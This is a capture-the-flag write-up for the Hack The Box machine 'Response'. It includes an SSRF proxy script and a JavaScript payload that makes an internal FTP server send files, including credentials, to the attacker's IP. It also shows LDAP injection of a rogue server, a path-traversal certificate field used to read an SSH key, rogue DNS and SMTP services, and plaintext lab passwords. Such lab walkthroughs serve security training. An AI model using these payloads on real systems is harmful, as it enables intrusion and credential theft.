Box Info#
| Name |  Response |
|---|---|
| Difficulty: | Insane |
| Points: | 50 |
| Release: | 14 May 2022 |
| IP: | 10.10.11.163 |
| OS: | Linux |
| Radar Graph: |  |
Practical#
Information Gathering#
Port Scanning#
┌──(kali㉿kali)-[~/HTB]
└─$ rustscan -a 10.10.11.163
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.163:22
Open 10.10.11.163:80
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sC -sV -p22,80 10.10.11.163
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 03:54 EST
Nmap scan report for 10.10.11.163
Host is up (0.082s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e9a4394afb065d5782fc4a0e0be46b25 (RSA)
| 256 a323e498dfb6911bf2ac2f1cc1469b15 (ECDSA)
|_ 256 fb105fda55a66b953df2e85c0336ff31 (ED25519)
80/tcp open http nginx 1.21.6
|_http-title: Did not follow redirect to http://www.response.htb
|_http-server-header: nginx/1.21.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds
Directory Scanning#
Port 80 shows a webpage
Run gobuster
┌──(kali㉿kali)-[~/HTB]
└─$ gobuster dir -u http://www.response.htb -w ~/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://www.response.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kali/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/15 04:02:42 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 169] [--> http://www.response.htb/css/]
/img (Status: 301) [Size: 169] [--> http://www.response.htb/img/]
/assets (Status: 301) [Size: 169] [--> http://www.response.htb/assets/]
/fonts (Status: 301) [Size: 169] [--> http://www.response.htb/fonts/]
/status (Status: 301) [Size: 169] [--> http://www.response.htb/status/]
There might be something in assets and status, let's run again.
Assets 403
After Base64 conversion, the result is:
{"servers":[{"id":1,"ip":"127.0.0.1","name":"Test Server"}]}
Now let's try get_chat_status from status/main.js.php.
The result is {"status":"running","vhost":"chat.response.htb"}
User Privileges#
After getting chat.response.htb, neither adding hosts records nor direct access works, so let's try using the previous JSON format settings.
And use api.response.htb as a proxy.
{"api_version":"1.0","endpoints":[{"desc":"get api status","method":"GET","route":"/"},{"desc":"get internal chat status","method":"GET","route":"/get_chat_status"},{"desc":"get monitored servers list","method":"GET","route":"/get_servers"}],"status":"running"}
Write a Python script.
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import random
import re
import requests
from socketserver import ThreadingMixIn
import sys
import threading
import time
hostName = "0.0.0.0"
serverPort = 80
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.request_handler('GET')
def do_POST(self):
self.request_handler('POST')
def request_handler(self, method):
self.random_number = random.randint(100000,999999)
path = self.path
myurl = 'http://chat.response.htb' + path
print(f"[{self.random_number}] {method} {myurl}")
if method == 'POST':
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
print(f"[{self.random_number}] body: {post_body}")
else:
post_body = None
digest = self.get_digest(myurl)
data = self.send_request_to_proxy(myurl, method, digest, post_body)
self.send_response(200)
if path.endswith('.js'):
self.send_header("Content-type", "application/javascript")
elif path.endswith('.css'):
self.send_header("Content-type", "text/css")
else:
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(data)
def get_digest(self, myurl):
url = 'http://www.response.htb/status/main.js.php'
cookies = {'PHPSESSID': myurl}
response = requests.get(url, cookies=cookies)
response.raise_for_status()
assert 'session_digest' in response.text
session_digest = re.search(r'\'session_digest\':\'([^\']+)', response.text).group(1)
#print(f"[{self.random_number}] digest: {session_digest}")
return session_digest
def send_request_to_proxy(self, myurl, method, digest, body=None):
url = 'http://proxy.response.htb/fetch'
data = {'url': myurl,
'url_digest': digest,
'method': method,
'session': '1a5455b829845168770cb337f1a05507',
'session_digest': 'd27e297b494df599e72985e6e9a166751d7de74136df9d74468aac0818c29125'}
if method == 'POST':
data['body'] = base64.b64encode(body)
response = requests.post(url, json=data)
response.raise_for_status()
assert 'body' in response.text and 'status_code' in response.text
body = response.json()['body']
status_code = response.json()['status_code']
print(f"[{self.random_number}] status_code from proxy: {status_code}; length of body: {len(body)}")
decoded_string = base64.b64decode(body)
return decoded_string
# This part is for multithreading.
# See https://stackoverflow.com/questions/14088294/multithreaded-web-server-in-python
# Multithreading is necessary because a lot of requests are made when opening the chat application.
# Some requests take several seconds to complete. I don't want these requests to hold back the other ones.
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def main():
print("Edit your /etc/hosts like this:")
print("10.10.11.163 www.response.htb proxy.response.htb # HTB machine IP")
print("10.10.16.29 chat.response.htb # my VPN IP")
print("While running this script, open http://chat.response.htb/ in the web browser\n")
# Without multithreading:
#webServer = HTTPServer((hostName, serverPort), MyServer)
# With multithreading (choose one or the other):
webServer = ThreadedHTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")
if __name__ == "__main__":
main()
After opening the webpage, I found
After downloading and checking README.md, the configuration file is in the server's index.js.
The only remaining employee is chatting.
LDAP Service#
Install
sudo apt install slapd
Configuration
sudo dpkg-reconfigure slapd
Select no
Fill in response.htb
organization name: response
Then create an LDIF file
dn: ou=users,dc=response,dc=htb
changetype: add
objectClass: organizationalPerson
sn:test
cn:test
dn: uid=admin,ou=users,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
userPassword: password
sn: test
cn: test
Start the service
service slapd start
ldapadd -x -D "cn=admin,dc=response,dc=htb" -w 'password' -H ldap://127.0.0.1 -f group.ldif
FTP#
After chatting, we received a clue
(yourself)
ok
bob
awesome!
i moved the internal ftp server... the new ip address is 172.18.0.2 and it is listening on port 2121. the creds are ftp_user / Secret12345
outgoing traffic from the server is currently allowed, but i will adjust the firewall to fix that
btw. would be great if you could send me the javascript article you were talking about
172.18.0.2 2121 ftp_user Secret12345
Create an HTML file, the reason for creating it can be seen in this article 👉 https://www.serv-u.com/resources/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
}
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nLIST\r\n");
</script>
The local IP is 10,10,16,29
10,15 means 10*256+15=2575
Then run
python3 -m http.server 9001
nc -lvnp 2575
Earlier, didn't Bob have something to discuss with admin? Send him a link (the above HTML file is named 1.html)
http://my_ip:9001/1.html
┌──(kali㉿kali)-[~/HTB]
└─$ nc -lvnp 2575
listening on [any] 2575 ...
connect to [10.10.16.29] from (UNKNOWN) [10.10.11.163] 39036
-rw-r--r-- 1 root root 74 Mar 16 2022 creds.txt
It gave me the authentication information.
Now let's modify the above code.
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
}
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nRETR creds.txt\r\n");
</script>
Get the result
ftp
---
ftp_user / Secret12345
ssh
---
bob / F6uXVwEjdZ46fsbXDmQK7YPY3OM
Let's try SSH.
🎉🎉🎉
┌──(kali㉿kali)-[~/HTB]
└─$ ssh [email protected]
The authenticity of host '10.10.11.163 (10.10.11.163)' can't be established.
ED25519 key fingerprint is SHA256:iPHy1XV7afTauFvMhysv/Ynl8yV39A02ZsTLR42/sd0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.163' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
System load: 1.69
Usage of /: 79.2% of 8.54GB
Memory usage: 29%
Swap usage: 0%
Processes: 287
Users logged in: 0
IPv4 address for br-01fdb3f286b8: 172.19.0.1
IPv4 address for br-feb0146a542b: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.163
IPv6 address for eth0: dead:beef::250:56ff:feb9:76ed
Last login: Sun Jan 15 04:14:32 2023 from 10.10.14.10
bob@response:~$ ls
user.txt
bob@response:~$ cat user.txt
cd**************************954
Lateral Movement#
After looking around, besides the user scryh, there isn't much to exploit.
Enter the directory
bob@response:/home/scryh$ ls -liah
total 40K
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11 2022 .
524290 drwxr-xr-x 4 root root 4.0K Mar 4 2022 ..
532271 lrwxrwxrwx 1 root root 9 Mar 4 2022 .bash_history -> /dev/null
532260 -rw-r--r-- 1 scryh scryh 220 Feb 25 2020 .bash_logout
532259 -rw-r--r-- 1 scryh scryh 3.7K Feb 25 2020 .bashrc
532263 drwx------ 3 scryh scryh 4.0K Mar 4 2022 .cache
565333 drwx------ 3 scryh scryh 4.0K Mar 11 2022 .config
173010 drwx------ 2 scryh scryh 4.0K Mar 16 2022 incident_2022-3-042
532258 -rw-r--r-- 1 scryh scryh 807 Feb 25 2020 .profile
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 scan
532261 drwx------ 2 scryh scryh 4.0K Mar 10 2022 .ssh
Incident doesn't have permission to access, let's check scan.
bob@response:/home/scryh/scan$ ls -liah
total 28K
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 .
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11 2022 ..
173020 drwxr-xr-x 4 scryh scryh 4.0K Mar 3 2022 data
173289 drwxr-xr-x 2 scryh scryh 4.0K Jan 15 12:23 output
156892 -rwxr-xr-x 1 scryh scryh 3.4K Mar 4 2022 scan.sh
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15 2022 scripts
156894 -rwxr-xr-x 1 scryh scryh 1.3K Mar 17 2022 send_report.py
In scripts, there are three nmap scripts.
bob@response:/home/scryh/scan/scripts$ ls -liah
total 68K
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15 2022 .
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 ..
173292 -rw-r--r-- 1 scryh scryh 9.5K Mar 3 2022 ssl-cert.nse
173293 -rw-r--r-- 1 scryh scryh 39K Feb 15 2022 ssl-enum-ciphers.nse
173294 -rw-r--r-- 1 scryh scryh 7.6K Feb 15 2022 ssl-heartbleed.nse
Next, the focus is on the three nmap scripts, understanding their functions, and maybe we can change 172.18.0.3 to our own, so we can see what's in the XML and PDF.
local NON_VERBOSE_FIELDS = { "commonName", "organizationName",
"stateOrProvinceName", "countryName" }
-- Test to see if the string is UTF-16 and transcode it if possible
local function maybe_decode(str)
-- If length is not even, then return as-is
if #str < 2 or #str % 2 == 1 then
return str
end
if str:byte(1) > 0 and str:byte(2) == 0 then
-- little-endian UTF-16
return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil)
elseif str:byte(1) == 0 and str:byte(2) > 0 then
-- big-endian UTF-16
return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil)
else
return str
end
end
Found four parameters and some names, which can be seen in the data folder.
bob@response:/home/scryh/scan/data/countryName$ ls
AD AN AW BF BN BW CG CO CY DZ ET GA GI GS HN IM JE KI KZ LS MD MM MT NA NO PE PN RE SC SK ST TF TN UA VC WS
AE AO AX BG BO BY CH CR CZ EC FI GB GL GT HR IN JM KM LA LT ME MN MU NC NP PF PR RO SD SL SV TG TO UG VE XK
AF AQ AZ BH BQ BZ CI CS DE EE FJ GD GM GU HT IO JO KN LB LU MF MO MV NE NR PG PS RS SE SM SX TH TR UM VG YE
AG AR BA BI BR CA CK CU DJ EG FK GE GN GW HU IQ JP KP LC LV MG MP MW NF NU PH PT RU SG SN SY TJ TT US VI YT
AI AS BB BJ BS CC CL CV DK EH FM GF GP GY ID IR KE KR LI LY MH MQ MX NG NZ PK PW RW SH SO SZ TK TV UY VN ZA
AL AT BD BL BT CD CM CW DM ER FO GG GQ HK IE IS KG KW LK MA MK MR MY NI OM PL PY SA SI SR TC TL TW UZ VU ZM
AM AU BE BM BV CF CN CX DO ES FR GH GR HM IL IT KH KY LR MC ML MS MZ NL PA PM QA SB SJ SS TD TM TZ VA WF ZW
bob@response:/home/scryh/scan/data/countryName$ cat CN
China
bob@response:/home/scryh/scan/data/stateOrProvinceName$ ls
Alabama Arizona California Florida Hawaii Indiana Maryland Nebraska Some-State Texas Virginia Wisconsin Zion
bob@response:/home/scryh/scan/data/stateOrProvinceName$ cat California
California is a state in the Western United States.
bob@response:/home/scryh/scan/data/stateOrProvinceName$
The content of stateOrProvinceName is relatively long, we can construct ../../../../.ssh/id_rsa.
Next, let's look at the output.
bob@response:/home/scryh/scan/output$ cat log.txt
scanning server ip 172.18.0.3
- retrieved manager uid: marie
- manager mail address: [email protected]
- failed to retrieve SMTP server for domain "response-test.htb" locally
- retrieved SMTP server for domain "response-test.htb": mail.response-test.htb.
- retrieved ip address of SMTP server: 172.18.0.3
- sending report output/scan_172.18.0.3.pdf to customer [email protected] via SMTP server 172.18.0.3
Run pspy.
2023/01/21 08:31:01 CMD: UID=0 PID=34603 | sudo -u scryh bash -c cd /home/scryh/scan;./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34605 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34604 | bash -c cd /home/scryh/scan;./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34611 | grep ipHostNumber
2023/01/21 08:31:01 CMD: UID=1000 PID=34610 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34612 | cut -d -f2
2023/01/21 08:31:01 CMD: UID=1000 PID=34613 | nmap -v -Pn 172.18.0.3 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_172.18.0.3.xml
2023/01/21 08:31:14 CMD: UID=1000 PID=34614 | wkhtmltopdf output/scan_172.18.0.3.xml output/scan_172.18.0.3.pdf
2023/01/21 08:34:15 CMD: UID=1000 PID=34852 | /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb (uid=marie)
2023/01/21 08:35:15 CMD: UID=1000 PID=34959 | /usr/bin/env python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
2023/01/21 08:35:15 CMD: UID=0 PID=34960 | /bin/bash /root/ldap/restore_ldap.sh
2023/01/21 08:35:15 CMD: UID=0 PID=34961 | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/
2023/01/21 08:35:15 CMD: UID=0 PID=34962 | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver
2023/01/21 08:35:15 CMD: UID=0 PID=34968 | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif
2023/01/21 08:37:15 CMD: UID=1000 PID=35100 | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
2023/01/21 08:37:15 CMD: UID=0 PID=35101 | /bin/bash /root/ldap/restore_ldap.sh
2023/01/21 08:37:15 CMD: UID=0 PID=35102 | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/
2023/01/21 08:37:15 CMD: UID=0 PID=35103 | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver
Take the command and run it, remember to fill in the variables.
bob@response:/home/scryh/scan$ bind_dn='cn=admin,dc=response,dc=htb'
bob@response:/home/scryh/scan$ pwd='aU4EZxEAOnimLNzk3'
bob@response:/home/scryh/scan$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'|grep ipHostNumber|cut -d ' ' -f2 # This command is part of scan.sh
172.18.0.3
bob@response:/home/scryh/scan/scripts$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'
# extended LDIF
#
# LDAPv3
# base <ou=servers,dc=response,dc=htb> with scope subtree
# filter: (objectclass=ipHost)
# requesting: ALL
#
# TestServer, servers, response.htb
dn: cn=TestServer,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 172.18.0.3
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Confirmed that the scan is for 172.18.0.3.
# TestServer, servers, response.htb is what we need to pay attention to when spoofing the service.
Start spoofing.
bob@response:~$ vim server.ldif
dn: cn=TestServer2,ou=servers,dc=response,dc=htb
changetype: add
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer2
manager: uid=kali,ou=customers,dc=response,dc=htb
ipHostNumber: 10.10.14.78
Add the service.
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
Also, since pspy shows that ipHost often resets, we need to write a timed script.
#!/bin/bash
while [ 1 -eq 1 ]; do
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
sleep 3
done
chmod +x test.sh
./test.sh &
Found
2023/01/21 10:42:14 CMD: UID=1000 PID=44453 | nmap -v -Pn 10.10.14.78 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_10.10.14.78.xml
Nmap is already scanning.
Now let's add the email sending information.
Check the format.
bob@response:~$ /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb '(uid=marie)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree# filter: (uid=marie)
# requesting: ALL
#
# marie, customers, response.htb
dn: uid=marie,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: mariemail: [email protected]
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
vim adduser.ldif
dn: uid=kali,ou=customers,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f adduser.ldif
Check if it was written.
bob@response:~$ ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb '(uid=kali)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree
# filter: (uid=kali)
# requesting: ALL
#
# kali, customers, response.htb
dn: uid=kali,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Next, we need to set up our own HTTPS service.
Generate a certificate.
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl genrsa -out server.key 4096
┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl req -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
State or Province Name (full name) [Some-State]:../../../.ssh/id_rsa
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:10.10.14.78
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl x509 -req -in server.csr -out server.crt -signkey server.key -days 3650
Certificate request self-signature ok
subject=C = AU, ST = ../../../.ssh/id_rsa, O = Internet Widgits Pty Ltd, CN = 10.10.14.78
┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat server.key >> server.crt
# Create https.py
https.py
import http.server, ssl
server_address = ('10.10.14.78',443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
server_side=True,
certfile='server.crt',
ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()
Set up DNS service#
sudo docker run -d\
--name dnsmasq \
--restart always \
-p 10.10.14.78:53:53/udp \
-p 10.10.14.78:8080:8080 \
-v /root/dnsmasq.conf:/etc/dnsmasq.conf \
--log-opt "max-size=100m" \
-e "HTTP_USER=admin" \
-e "HTTP_PASS=admin" \
jpillora/dnsmasq
Modify dnsmasq.conf
log-queries
no-resolv
server=1.0.0.1
server=1.1.1.1
strict-order
server=/company/10.0.0.1
address=/reponse-test.htb/10.10.14.78
address=/mail.response-test.htb/10.10.14.78
localmx
mx-host=response-test.htb,mail.response-test.htb,50
Set up SMTP service#
git clone https://github.com/ankraft/smtpproxy.git
cd smtpproxy
mv smtpproxy.ini.example smtpproxy.ini
# Modify smtpproxy.ini
[config]
port=25
sleeptime=30
waitafterpop=5
debuglevel=0
deleteonerror=true
[logging]
file=smtpproxy.log
size=1000000
count=10
level=INFO
[[email protected]]
localhostname=response-test.htb
smtphost=10.10.14.78
smtpsecurity=tls
smtpusername=username
smtppassword=password
popbeforesmtp=true
pophost=pop.example.com
popport=995
popssl=true
popusername=username
poppassword=password
popcheckdelay=60
returnpath=[email protected]
[[email protected]>]
use=[email protected]
It has already sent the PDF.
2023/01/21 11:56:12 CMD: UID=1000 PID=53947 | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
Run python https.py
Run python2 smtpproxy.py
┌──(root㉿kali)-[~/smtpproxy/msgs]
└─# ls -liah
total 68K
2228303 drwxr-xr-x 2 root root 4.0K Jan 21 07:12 .
2228234 drwxr-xr-x 5 root root 4.0K Jan 21 07:08 ..
2228308 -rw------- 1 root root 60K Jan 21 07:12 tmpbx7ve7.msg
Received the message (those with a phobia of density can skip 🙈)
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